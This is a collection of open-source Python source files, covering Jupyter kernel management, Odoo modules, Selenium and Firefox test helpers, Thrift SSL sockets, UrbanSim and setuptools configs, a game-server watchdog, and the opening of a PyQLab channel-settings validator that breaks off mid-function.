"""Clean up resources when the kernel is shut down"""
if connection_file:
self.cleanup_connection_file()
self.cleanup_ipc_files()
self._close_control_socket()
def shutdown_kernel(self, now=False, restart=False):
"""Attempts to the stop the kernel process cleanly.
This attempts to shutdown the kernels cleanly by:
1. Sending it a shutdown message over the shell channel.
2. If that fails, the kernel is shutdown forcibly by sending it
a signal.
Parameters
----------
now : bool
Should the kernel be forcible killed *now*. This skips the
first, nice shutdown attempt.
restart: bool
Will this kernel be restarted after it is shutdown. When this
is True, connection files will not be cleaned up.
"""
# Stop monitoring for restarting while we shutdown.
self.stop_restarter()
if now:
self._kill_kernel()
else:
self.request_shutdown(restart=restart)
# Don't send any additional kernel kill messages immediately, to give
# the kernel a chance to properly execute shutdown actions. Wait for at
# most 1s, checking every 0.1s.
self.finish_shutdown()
self.cleanup(connection_file=not restart)
def restart_kernel(self, now=False, **kw):
"""Restarts a kernel with the arguments that were used to launch it.
If the old kernel was launched with random ports, the same ports will be
used for the new kernel. The same connection file is used again.
Parameters
----------
now : bool, optional
If True, the kernel is forcefully restarted *immediately*, without
having a chance to do any cleanup action. Otherwise the kernel is
given 1s to clean up before a forceful restart is issued.
In all cases the kernel is restarted, the only difference is whether
it is given a chance to perform a clean shutdown or not.
`**kw` : optional
Any options specified here will overwrite those used to launch the
kernel.
"""
if self._launch_args is None:
raise RuntimeError("Cannot restart the kernel. "
"No previous call to 'start_kernel'.")
else:
# Stop currently running kernel.
self.shutdown_kernel(now=now, restart=True)
# Start new kernel.
self._launch_args.update(kw)
self.start_kernel(**self._launch_args)
@property
def has_kernel(self):
"""Has a kernel been started that we are managing."""
return self.kernel is not None
def _kill_kernel(self):
"""Kill the running kernel.
This is a private method, callers should use shutdown_kernel(now=True).
"""
if self.has_kernel:
# Signal the kernel to terminate (sends SIGKILL on Unix and calls
# TerminateProcess() on Win32).
try:
self.kernel.kill()
except OSError as e:
# In Windows, we will get an Access Denied error if the process
# has already terminated. Ignore it.
if sys.platform == 'win32':
if e.winerror != 5:
raise
# On Unix, we may get an ESRCH error if the process has already
# terminated. Ignore it.
else:
from errno import ESRCH
if e.errno != ESRCH:
raise
# Block until the kernel terminates.
self.kernel.wait()
self.kernel = None
else:
raise RuntimeError("Cannot kill kernel. No kernel is running!")
def interrupt_kernel(self):
"""Interrupts the kernel by sending it a signal.
Unlike ``signal_kernel``, this operation is well supported on all
platforms.
"""
if self.has_kernel:
if sys.platform == 'win32':
from .win_interrupt import send_interrupt
send_interrupt(self.kernel.win32_interrupt_event)
else:
self.signal_kernel(signal.SIGINT)
else:
raise RuntimeError("Cannot interrupt kernel. No kernel is running!")
def signal_kernel(self, signum):
"""Sends a signal to the process group of the kernel (this
usually includes the kernel and any subprocesses spawned by
the kernel).
Note that since only SIGTERM is supported on Windows, this function is
only useful on Unix systems.
"""
if self.has_kernel:
if hasattr(os, "getpgid") and hasattr(os, "killpg"):
try:
pgid = os.getpgid(self.kernel.pid)
os.killpg(pgid, signum)
return
except OSError:
pass
self.kernel.send_signal(signum)
else:
raise RuntimeError("Cannot signal kernel. No kernel is running!")
def is_alive(self):
"""Is the kernel process still running?"""
if self.has_kernel:
if self.kernel.poll() is None:
return True
else:
return False
else:
# we don't have a kernel
return False
KernelManagerABC.register(KernelManager)
def start_new_kernel(startup_timeout=60, kernel_name='python', **kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
@contextmanager
def run_kernel(**kwargs):
"""Context manager to create a kernel in a subprocess.
The kernel is shut down when the context exits.
Returns
-------
kernel_client: connected KernelClient instance
"""
km, kc = start_new_kernel(**kwargs)
try:
yield kc
finally:
kc.stop_channels()
km.shutdown_kernel(now=True)
| mit |
rschnapka/odoo | addons/l10n_th/__init__.py | 893 | 1045 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
FNST-OpenStack/horizon | openstack_dashboard/test/integration_tests/basewebobject.py | 15 | 3946 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import selenium.common.exceptions as Exceptions
import selenium.webdriver.support.ui as Support
from selenium.webdriver.support import wait
import unittest
class BaseWebObject(unittest.TestCase):
"""Base class for all web objects."""
def __init__(self, driver, conf):
self.driver = driver
self.conf = conf
self.explicit_wait = self.conf.selenium.explicit_wait
def _is_element_present(self, *locator):
try:
self._turn_off_implicit_wait()
self._get_element(*locator)
return True
except Exceptions.NoSuchElementException:
return False
finally:
self._turn_on_implicit_wait()
def _is_element_visible(self, *locator):
try:
return self._get_element(*locator).is_displayed()
except (Exceptions.NoSuchElementException,
Exceptions.ElementNotVisibleException):
return False
def _is_element_displayed(self, element):
try:
return element.is_displayed()
except Exception:
return False
def _is_text_visible(self, element, text):
try:
return element.text == text
except Exception:
return False
def _get_element(self, *locator):
return self.driver.find_element(*locator)
def _get_elements(self, *locator):
return self.driver.find_elements(*locator)
def _fill_field_element(self, data, field_element):
field_element.clear()
field_element.send_keys(data)
return field_element
def _select_dropdown(self, value, element):
select = Support.Select(element)
select.select_by_visible_text(value)
def _select_dropdown_by_value(self, value, element):
select = Support.Select(element)
select.select_by_value(value)
def _turn_off_implicit_wait(self):
self.driver.implicitly_wait(0)
def _turn_on_implicit_wait(self):
self.driver.implicitly_wait(self.conf.selenium.page_timeout)
def _wait_until(self, predicate, timeout=None, poll_frequency=0.5):
"""Wait until the value returned by predicate is not False or
the timeout is elapsed.
'predicate' takes the driver as argument.
"""
if not timeout:
timeout = self.explicit_wait
wait.WebDriverWait(self.driver, timeout, poll_frequency).until(
predicate)
def _wait_till_text_present_in_element(self, element, text, timeout=None):
"""Waiting for a text to appear in a certain element very often is
actually waiting for a _different_ element with a different text to
appear in place of an old element. So a way to avoid capturing stale
element reference should be provided for this use case.
"""
def predicate(_):
elt = element() if hasattr(element, '__call__') else element
return self._is_text_visible(elt, text)
self._wait_until(predicate, timeout)
def _wait_till_element_visible(self, element, timeout=None):
self._wait_until(lambda x: self._is_element_displayed(element),
timeout)
def _wait_till_element_disappears(self, element, timeout=None):
self._wait_until(lambda x: not self._is_element_displayed(element),
timeout)
| apache-2.0 |
galgeek/firefox-ui-tests | firefox_puppeteer/api/places.py | 3 | 5870 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
from collections import namedtuple
from marionette_driver.errors import MarionetteException, TimeoutException
from ..base import BaseLib
class Places(BaseLib):
"""Low-level access to several bookmark and history related actions."""
BookmarkFolders = namedtuple('bookmark_folders',
['root', 'menu', 'toolbar', 'tags', 'unfiled'])
bookmark_folders = BookmarkFolders(1, 2, 3, 4, 5)
# Bookmark related helpers #
def is_bookmarked(self, url):
"""Checks if the given URL is bookmarked.
:param url: The URL to Check
:returns: True, if the URL is a bookmark
"""
return self.marionette.execute_script("""
let url = arguments[0];
let bs = Cc["@mozilla.org/browser/nav-bookmarks-service;1"]
.getService(Ci.nsINavBookmarksService);
let ios = Cc["@mozilla.org/network/io-service;1"]
.getService(Ci.nsIIOService);
let uri = ios.newURI(url, null, null);
let results = bs.getBookmarkIdsForURI(uri, {});
return results.length == 1;
""", script_args=[url])
def get_folder_ids_for_url(self, url):
"""Retrieves the folder ids where the given URL has been bookmarked in.
:param url: URL of the bookmark
:returns: List of folder ids
"""
return self.marionette.execute_script("""
let url = arguments[0];
let bs = Cc["@mozilla.org/browser/nav-bookmarks-service;1"]
.getService(Ci.nsINavBookmarksService);
let ios = Cc["@mozilla.org/network/io-service;1"]
.getService(Ci.nsIIOService);
let bookmarkIds = bs.getBookmarkIdsForURI(ios.newURI(url, null, null), {});
let folderIds = [];
for (let i = 0; i < bookmarkIds.length; i++) {
folderIds.push(bs.getFolderIdForItem(bookmarkIds[i]));
}
return folderIds;
""", script_args=[url])
def is_bookmark_star_button_ready(self):
"""Checks if the status of the star-button is not updating.
:returns: True, if the button is ready
"""
return self.marionette.execute_script("""
let button = window.BookmarkingUI;
return button.status !== button.STATUS_UPDATING;
""")
def restore_default_bookmarks(self):
"""Restores the default bookmarks for the current profile."""
retVal = self.marionette.execute_async_script("""
Cu.import("resource://gre/modules/BookmarkHTMLUtils.jsm");
Cu.import("resource://gre/modules/Services.jsm");
// Default bookmarks.html file is stored inside omni.jar,
// so get it via a resource URI
let defaultBookmarks = 'resource:///defaults/profile/bookmarks.html';
let observer = {
observe: function (aSubject, aTopic, aData) {
Services.obs.removeObserver(observer, "bookmarks-restore-success");
Services.obs.removeObserver(observer, "bookmarks-restore-failed");
marionetteScriptFinished(aTopic == "bookmarks-restore-success");
}
};
// Trigger the import of the default bookmarks
Services.obs.addObserver(observer, "bookmarks-restore-success", false);
Services.obs.addObserver(observer, "bookmarks-restore-failed", false);
BookmarkHTMLUtils.importFromURL(defaultBookmarks, true);
""", script_timeout=10000)
if not retVal:
raise errors.MarionetteException("Restore Default Bookmarks failed")
# Browser history related helpers #
def remove_all_history(self):
"""Removes all history items."""
try:
self.marionette.execute_async_script("""
Cu.import("resource://gre/modules/Services.jsm");
let hs = Cc["@mozilla.org/browser/nav-history-service;1"]
.getService(Ci.nsIBrowserHistory);
let observer = {
observe: function (aSubject, aTopic, aData) {
Services.obs.removeObserver(observer, 'places-expiration-finished');
marionetteScriptFinished(true);
}
};
// Remove the pages, then block until we're done or until timeout is reached
Services.obs.addObserver(observer, 'places-expiration-finished', false);
hs.removeAllPages();
""", script_timeout=10000)
except TimeoutException:
# TODO: In case of a timeout clean-up the registered topic
pass
def wait_for_visited(self, urls, callback):
"""Waits until all passed-in urls have been visited.
:param urls: List of URLs which need to be visited and indexed
:param callback: Method to execute which triggers loading of the URLs
"""
# Bug 1121691: Needs observer handling support with callback first
# Until then we have to wait about 4s to ensure the page has been indexed
callback()
from time import sleep
sleep(4)
# Plugin related helpers #
def clear_plugin_data(self):
"""Clears any kind of locally stored data from plugins."""
self.marionette.execute_script("""
let host = Cc["@mozilla.org/plugin/host;1"].getService(Ci.nsIPluginHost);
let tags = host.getPluginTags();
tags.forEach(aTag => {
try {
host.clearSiteData(aTag, null, Ci.nsIPluginHost.FLAG_CLEAR_ALL, -1);
} catch (ex) {
}
});
""")
| mpl-2.0 |
lucafavatella/intellij-community | python/helpers/profiler/thrift/transport/TSSLSocket.py | 9 | 7756 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
import os
import socket
import ssl
from thrift.transport import TSocket
from thrift.transport.TTransport import TTransportException
class TSSLSocket(TSocket.TSocket):
"""
SSL implementation of client-side TSocket
This class creates outbound sockets wrapped using the
python standard ssl module for encrypted connections.
The protocol used is set using the class variable
SSL_VERSION, which must be one of ssl.PROTOCOL_* and
defaults to ssl.PROTOCOL_TLSv1 for greatest security.
"""
SSL_VERSION = ssl.PROTOCOL_TLSv1
def __init__(self,
host='localhost',
port=9090,
validate=True,
ca_certs=None,
keyfile=None,
certfile=None,
unix_socket=None):
"""Create SSL TSocket
@param validate: Set to False to disable SSL certificate validation
@type validate: bool
@param ca_certs: Filename to the Certificate Authority pem file, possibly a
file downloaded from: http://curl.haxx.se/ca/cacert.pem This is passed to
the ssl_wrap function as the 'ca_certs' parameter.
@type ca_certs: str
@param keyfile: The private key
@type keyfile: str
@param certfile: The cert file
@type certfile: str
Raises an IOError exception if validate is True and the ca_certs file is
None, not present or unreadable.
"""
self.validate = validate
self.is_valid = False
self.peercert = None
if not validate:
self.cert_reqs = ssl.CERT_NONE
else:
self.cert_reqs = ssl.CERT_REQUIRED
self.ca_certs = ca_certs
self.keyfile = keyfile
self.certfile = certfile
if validate:
if ca_certs is None or not os.access(ca_certs, os.R_OK):
raise IOError('Certificate Authority ca_certs file "%s" '
'is not readable, cannot validate SSL '
'certificates.' % (ca_certs))
TSocket.TSocket.__init__(self, host, port, unix_socket)
def open(self):
try:
res0 = self._resolveAddr()
for res in res0:
sock_family, sock_type = res[0:2]
ip_port = res[4]
plain_sock = socket.socket(sock_family, sock_type)
self.handle = ssl.wrap_socket(plain_sock,
ssl_version=self.SSL_VERSION,
do_handshake_on_connect=True,
ca_certs=self.ca_certs,
keyfile=self.keyfile,
certfile=self.certfile,
cert_reqs=self.cert_reqs)
self.handle.settimeout(self._timeout)
try:
self.handle.connect(ip_port)
except socket.error, e:
if res is not res0[-1]:
continue
else:
raise e
break
except socket.error, e:
if self._unix_socket:
message = 'Could not connect to secure socket %s: %s' \
% (self._unix_socket, e)
else:
message = 'Could not connect to %s:%d: %s' % (self.host, self.port, e)
raise TTransportException(type=TTransportException.NOT_OPEN,
message=message)
if self.validate:
self._validate_cert()
def _validate_cert(self):
"""internal method to validate the peer's SSL certificate, and to check the
commonName of the certificate to ensure it matches the hostname we
used to make this connection. Does not support subjectAltName records
in certificates.
raises TTransportException if the certificate fails validation.
"""
cert = self.handle.getpeercert()
self.peercert = cert
if 'subject' not in cert:
raise TTransportException(
type=TTransportException.NOT_OPEN,
message='No SSL certificate found from %s:%s' % (self.host, self.port))
fields = cert['subject']
for field in fields:
# ensure structure we get back is what we expect
if not isinstance(field, tuple):
continue
cert_pair = field[0]
if len(cert_pair) < 2:
continue
cert_key, cert_value = cert_pair[0:2]
if cert_key != 'commonName':
continue
certhost = cert_value
# this check should be performed by some sort of Access Manager
if certhost == self.host:
# success, cert commonName matches desired hostname
self.is_valid = True
return
else:
raise TTransportException(
type=TTransportException.UNKNOWN,
message='Hostname we connected to "%s" doesn\'t match certificate '
'provided commonName "%s"' % (self.host, certhost))
raise TTransportException(
type=TTransportException.UNKNOWN,
message='Could not validate SSL certificate from '
'host "%s". Cert=%s' % (self.host, cert))
class TSSLServerSocket(TSocket.TServerSocket):
"""SSL implementation of TServerSocket
This uses the ssl module's wrap_socket() method to provide SSL
negotiated encryption.
"""
SSL_VERSION = ssl.PROTOCOL_TLSv1
def __init__(self,
host=None,
port=9090,
certfile='cert.pem',
unix_socket=None):
"""Initialize a TSSLServerSocket
@param certfile: filename of the server certificate, defaults to cert.pem
@type certfile: str
@param host: The hostname or IP to bind the listen socket to,
i.e. 'localhost' for only allowing local network connections.
Pass None to bind to all interfaces.
@type host: str
@param port: The port to listen on for inbound connections.
@type port: int
"""
self.setCertfile(certfile)
TSocket.TServerSocket.__init__(self, host, port)
def setCertfile(self, certfile):
"""Set or change the server certificate file used to wrap new connections.
@param certfile: The filename of the server certificate,
i.e. '/etc/certs/server.pem'
@type certfile: str
Raises an IOError exception if the certfile is not present or unreadable.
"""
if not os.access(certfile, os.R_OK):
raise IOError('No such certfile found: %s' % (certfile))
self.certfile = certfile
def accept(self):
plain_client, addr = self.handle.accept()
try:
client = ssl.wrap_socket(plain_client, certfile=self.certfile,
server_side=True, ssl_version=self.SSL_VERSION)
except ssl.SSLError, ssl_exc:
# failed handshake/ssl wrap, close socket to client
plain_client.close()
# raise ssl_exc
# We can't raise the exception, because it kills most TServer derived
# serve() methods.
# Instead, return None, and let the TServer instance deal with it in
# other exception handling. (but TSimpleServer dies anyway)
return None
result = TSocket.TSocket()
result.setHandle(client)
return result
| apache-2.0 |
iut-ibk/DynaMind-UrbanSim | 3rdparty/opus/src/urbansim/configs/hlcm_estimation_config.py | 2 | 1304 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.configs.estimation_base_config import run_configuration as config
from urbansim.configs.base_configuration import AbstractUrbansimConfiguration
from urbansim.configs.estimation_base_config import EstimationBaseConfig
class HLCMEstimationConfig(EstimationBaseConfig):
def __init__(self, base_configuration=AbstractUrbansimConfiguration):
EstimationBaseConfig.__init__(self, base_configuration)
self.update_config()
def update_config(self):
self.merge(get_changes_for_hlcm_estimation(self))
def get_changes_for_hlcm_estimation(config=None):
estimation_configuration = {}
estimation_configuration["models"] = [
{"household_relocation_model": ["run"]},
{"household_location_choice_model": ["estimate"]}
]
estimation_configuration["datasets_to_preload"] = {
'gridcell':{},
'household':{}
}
return estimation_configuration
run_configuration = config.copy()
estimation_configuration = get_changes_for_hlcm_estimation()
run_configuration.merge(estimation_configuration)
| gpl-2.0 |
EricNeedham/assignment-1 | venv/lib/python2.7/site-packages/setuptools/tests/environment.py | 359 | 4658 | import os
import zipfile
import sys
import tempfile
import unittest
import shutil
import stat
import unicodedata
from subprocess import Popen as _Popen, PIPE as _PIPE
def _extract(self, member, path=None, pwd=None):
"""for zipfile py2.5 borrowed from cpython"""
if not isinstance(member, zipfile.ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
return _extract_member(self, member, path, pwd)
def _extract_from_zip(self, name, dest_path):
dest_file = open(dest_path, 'wb')
try:
dest_file.write(self.read(name))
finally:
dest_file.close()
def _extract_member(self, member, targetpath, pwd):
"""for zipfile py2.5 borrowed from cpython"""
# build the destination pathname, replacing
# forward slashes to platform specific separators.
# Strip trailing path separator, unless it represents the root.
if (targetpath[-1:] in (os.path.sep, os.path.altsep)
and len(os.path.splitdrive(targetpath)[1]) > 1):
targetpath = targetpath[:-1]
# don't include leading "/" from file name if present
if member.filename[0] == '/':
targetpath = os.path.join(targetpath, member.filename[1:])
else:
targetpath = os.path.join(targetpath, member.filename)
targetpath = os.path.normpath(targetpath)
# Create all upper directories if necessary.
upperdirs = os.path.dirname(targetpath)
if upperdirs and not os.path.exists(upperdirs):
os.makedirs(upperdirs)
if member.filename[-1] == '/':
if not os.path.isdir(targetpath):
os.mkdir(targetpath)
return targetpath
_extract_from_zip(self, member.filename, targetpath)
return targetpath
def _remove_dir(target):
#on windows this seems to a problem
for dir_path, dirs, files in os.walk(target):
os.chmod(dir_path, stat.S_IWRITE)
for filename in files:
os.chmod(os.path.join(dir_path, filename), stat.S_IWRITE)
shutil.rmtree(target)
class ZippedEnvironment(unittest.TestCase):
datafile = None
dataname = None
old_cwd = None
def setUp(self):
if self.datafile is None or self.dataname is None:
return
if not os.path.isfile(self.datafile):
self.old_cwd = None
return
self.old_cwd = os.getcwd()
self.temp_dir = tempfile.mkdtemp()
zip_file, source, target = [None, None, None]
try:
zip_file = zipfile.ZipFile(self.datafile)
for files in zip_file.namelist():
_extract(zip_file, files, self.temp_dir)
finally:
if zip_file:
zip_file.close()
del zip_file
os.chdir(os.path.join(self.temp_dir, self.dataname))
def tearDown(self):
#Assume setUp was never completed
if self.dataname is None or self.datafile is None:
return
try:
if self.old_cwd:
os.chdir(self.old_cwd)
_remove_dir(self.temp_dir)
except OSError:
#sigh?
pass
def _which_dirs(cmd):
result = set()
for path in os.environ.get('PATH', '').split(os.pathsep):
filename = os.path.join(path, cmd)
if os.access(filename, os.X_OK):
result.add(path)
return result
def run_setup_py(cmd, pypath=None, path=None,
data_stream=0, env=None):
"""
Execution command for tests, separate from those used by the
code directly to prevent accidental behavior issues
"""
if env is None:
env = dict()
for envname in os.environ:
env[envname] = os.environ[envname]
#override the python path if needed
if pypath is not None:
env["PYTHONPATH"] = pypath
#overide the execution path if needed
if path is not None:
env["PATH"] = path
if not env.get("PATH", ""):
env["PATH"] = _which_dirs("tar").union(_which_dirs("gzip"))
env["PATH"] = os.pathsep.join(env["PATH"])
cmd = [sys.executable, "setup.py"] + list(cmd)
#regarding the shell argument, see: http://bugs.python.org/issue8557
try:
proc = _Popen(cmd, stdout=_PIPE, stderr=_PIPE,
shell=(sys.platform == 'win32'), env=env)
data = proc.communicate()[data_stream]
except OSError:
return 1, ''
#decode the console string if needed
if hasattr(data, "decode"):
data = data.decode() # should use the preffered encoding
data = unicodedata.normalize('NFC', data)
#communciate calls wait()
return proc.returncode, data
| mit |
fisadev/chivalry-server-tools | server_runner.py | 1 | 3556 | # coding: utf-8
from datetime import datetime
from os import popen, system, startfile
from time import sleep
import requests
from pyquery import PyQuery
# web listing active servers
SERVER_STATUS_URL = 'http://refactor.jp/chivalry/?country=AR'
# if this text is present, the server is up
SERVER_NAME = 'Argentina | Round Table | chivarg.com'
# if this text is present, the web list is working
WEB_CONTROL_TEXT = 'Servers in'
# windows task name of the server
TASK_NAME = 'UDKLogging.exe'
# path to the server bat file to start it
SERVER_SCRIPT = r'C:\Documents and Settings\mejorserver\Desktop\chivalry\round_table\start_server.bat'
# time intervals, in seconds
# every how much check for visibility?
CHECK_INTERVAL = 300
# how much does the server takes to start and appear on the lists
SERVER_START_DELAY = 300
# how much does the server takes to stop
SERVER_STOP_DELAY = 30
# how much to wait after an "unknown" result in the visibility
UNKNOWN_VISIBILITY_DELAY = 60
# possible server visibility values
VISIBLE = 'visible'
INVISIBLE = 'invisible'
UNKNOWN = 'unknown'
def server_visible():
"""Is the server visible in the servers list?"""
print 'Checking server visibility...'
try:
response = requests.get(SERVER_STATUS_URL).content
if WEB_CONTROL_TEXT not in response:
# can't be sure the web is working, the page is returning something
# not expected
visibility = UNKNOWN
elif SERVER_NAME not in response:
# server not in list, is invisible
visibility = INVISIBLE
else:
# server in list, but is it responding?
no_response_row = PyQuery(response)('a:contains("%s")' % SERVER_NAME).parents('.noResponse')
if no_response_row:
# the site says the server is not responding
visibility = INVISIBLE
else:
# server visible! yay for uptime :)
visibility = VISIBLE
except Exception as err:
# web not accessible, can't be sure of server status
print err
visibility = UNKNOWN
print 'Result:', visibility
return visibility
def server_running():
"""Is the server process running in windows?"""
print 'Checking server running...'
tasks = popen('tasklist').read()
running = TASK_NAME in tasks
print 'Result:', running
return running
def stop_server():
"""Kill the server process in windows."""
print 'Stopping server...'
system('taskkill /im ' + TASK_NAME)
sleep(SERVER_STOP_DELAY)
print 'Done'
def start_server():
"""Start the server process in windows."""
print 'Starting server...'
startfile(SERVER_SCRIPT)
sleep(SERVER_START_DELAY)
print 'Done'
def check_loop():
while True:
print 'Check', datetime.now()
running = server_running()
if running:
# server running, is it visible?
visibility = server_visible()
if visibility == INVISIBLE:
# stop it, will be restarted in next check
stop_server()
elif visibility == VISIBLE:
# everything fine, wait for next check
sleep(CHECK_INTERVAL)
elif visibility == UNKNOWN:
# don't know if visible, try again
sleep(UNKNOWN_VISIBILITY_DELAY)
else:
# server not running, start it and wait for it to appear on lists
# before doing another check
start_server()
check_loop()
| mit |
mathi123/vertical-construction | base_construction_architect/__openerp__.py | 1 | 1348 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Mathias Colpaert
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "OCA Construction: Architect Base",
'summary': "Identify partners as architects.",
'description': """
This module allows you to:
- Identify a partner as an architect.
- Filter architects from address book.
""",
'author': "Mathias Colpaert, Odoo Community Association (OCA)",
'category': "construction",
'version': '0.1',
'depends': ['base'],
'data': ['views.xml'],
}
| agpl-3.0 |
BBN-Q/PyQLab | ExpSettingsVal.py | 3 | 13830 | '''
ExpSettingsVal -
Validates Experimental Settings against a set of rules known to cause
the Compiler (Compiler.py) to fail if they are not followed
Created on April 17, 2015
Original Author: Brian Donovan
Copyright 2015 Raytheon BBN Technologies
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from builtins import str
import floatbits
import itertools
import re
import h5py
from atom.api import Str
import Sweeps
import Libraries
import QGL.Channels
import QGL.ChannelLibrary
channels = QGL.ChannelLibrary.channelLib
instruments = Libraries.instrumentLib.instrDict
measurements = Libraries.measLib.filterDict
sweeps = Libraries.sweepLib.sweepDict
# The following naming conventions are currently enforced
# See: https://github.com/BBN-Q/PyQLab/wiki
#
# Two LogicalMarkerChannels are required:
# 1 digitizerTrig
# 2 slaveTrig
#
# Logical Channels:
# 1 PhysicalChannel but be in library
# 2 LogicalMarkerChannel must map to PhysicalMarkerChannel
# 3 Not LogicalMarkerChannel not map to PhysicalMarkerChannel
#
# Physical Channels:
# 1 PhysicalChannel must have an AWG assigned
# 2 The assigned AWG must exist in the library
# 3 The name of the PhysicalChannel channel must be of the form AWGName-AWGChannel
# 4 Device specific naming conventions
# APS: 12, 34, 1m1, 2m1, 3m1, 4m1
# APS2: 12, 12m1, 12m2, 12m3, 12m4
# Tek5014: 12, 34, 1m1, 1m2, 2m1, 2m2, 3m1, 3m2, 4m1, 4m2
#
# Instruments Names:
# 1 Instrument names must be valid Matlab Identifiers
# Conventions to be added
#
#
#####################################################################################
## Program Constants
# Matlab valid identifier -- Starts with a letter, followed by letters, digits, or underscores.
# Maximum length is the return value from the namelengthmax function
# namelengthmax returned 63 on Matlab 2015a 64-bit linux
MATLAB_NAME_LENGTH_MAX = 63
MATLAB_FORMAT_STRING = "\A[a-zA-Z]\w{0,%i}?\Z" % (MATLAB_NAME_LENGTH_MAX - 1)
MATLAB_VALID_NAME_REGEX = re.compile(MATLAB_FORMAT_STRING)
#####################################################################################
## Helper functions for list comprehension
def is_logicalmarker_channel(name):
return is_channel_type(name, QGL.Channels.LogicalMarkerChannel)
def is_physical_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalChannel)
def is_physicalmarker_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalMarkerChannel)
def is_physicalIQ_channel(name):
return is_channel_type(name, QGL.Channels.PhysicalQuadratureChannel)
def is_qubit_channel(name):
return is_channel_type(name, QGL.Channels.Qubit)
def is_measurement_channel(name):
return is_channel_type(name, QGL.Channels.Measurement)
def requires_physical_channel(name):
return is_channel_type(name, QGL.Channels.LogicalChannel)
def is_channel_type(name, channelType):
return isinstance(channels[name], channelType)
#####################################################################################
### Apply global rules
def test_require_physical():
"""Enforces rule requiring physical channels for certain logical channels
See requires_physical_channel() for list of Channel types requiring a
Physical channel.
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
testChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
for channel in testChannels:
physicalChannel = channels[channel].physChan
if physicalChannel is None:
errMsg = '"{0}" channel "{1}" Physical Channel is not defined'.format(channels[channel].__class__.__name__, channel)
errors.append(errMsg)
else:
physicalChannelName = channels[channel].physChan.label
if physicalChannelName not in channels.keys():
errMsg = 'Physical Channel "{0}" not found'.format(physicalChannelName)
errors.append(errMsg)
return errors
## Apply invidual test based on channel type
def test_logical_channels():
"""
Enforces rules applied against logical channels
These are rules in addition to those applied at the global level.
Rules:
PhysicalChannel but be in library
"Markerness" of logical and physical channels must match, i.e.
LogicalMarkerChannel must map to PhysicalMarkerChannel.
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
# require all LogicalMarkerChannels to map to PhysicalMarkerChannels
# and require all not LogicalMarkerChannels to map to not PhysicalMarkerChannels
logicalChannels = [channelName for channelName in channels.keys() if requires_physical_channel(channelName)]
for channel in logicalChannels:
errorHeader = '{0} Markerness of {1} and {2} do not match'
if not channels[channel].physChan:
continue
physicalChannelName = channels[channel].physChan.label
if physicalChannelName not in channels.keys():
continue
if is_logicalmarker_channel(channel) != is_physicalmarker_channel(physicalChannelName):
errMsg = errorHeader.format(channels[channel].__class__.__name__, channel, physicalChannelName)
errors.append(errMsg)
return errors
def test_physical_channels():
"""
Enforces rules applied against physical channels
Rules:
PhysicalChannel must have an instrument (AWG or digitizer) assigned
The assigned instrument must exist in the library
The name of the PhysicalChannel channel must be of the form AWGName-AWGChannel
Device channels have model specific naming conventions
"""
errors = []
channels = QGL.ChannelLibrary.channelLib
physicalChannels = [channelName for channelName in channels.keys() if is_physical_channel(channelName)]
for channel in physicalChannels:
instrument = channels[channel].instrument
if instrument == '':
errMsg = 'Physical Channel "{0}" requires an instrument assignment'.format(channel)
errors.append(errMsg)
elif instrument not in instruments.keys():
errMsg = 'Physical Channel "{0}" instrument {1} not found'.format(channel, awg)
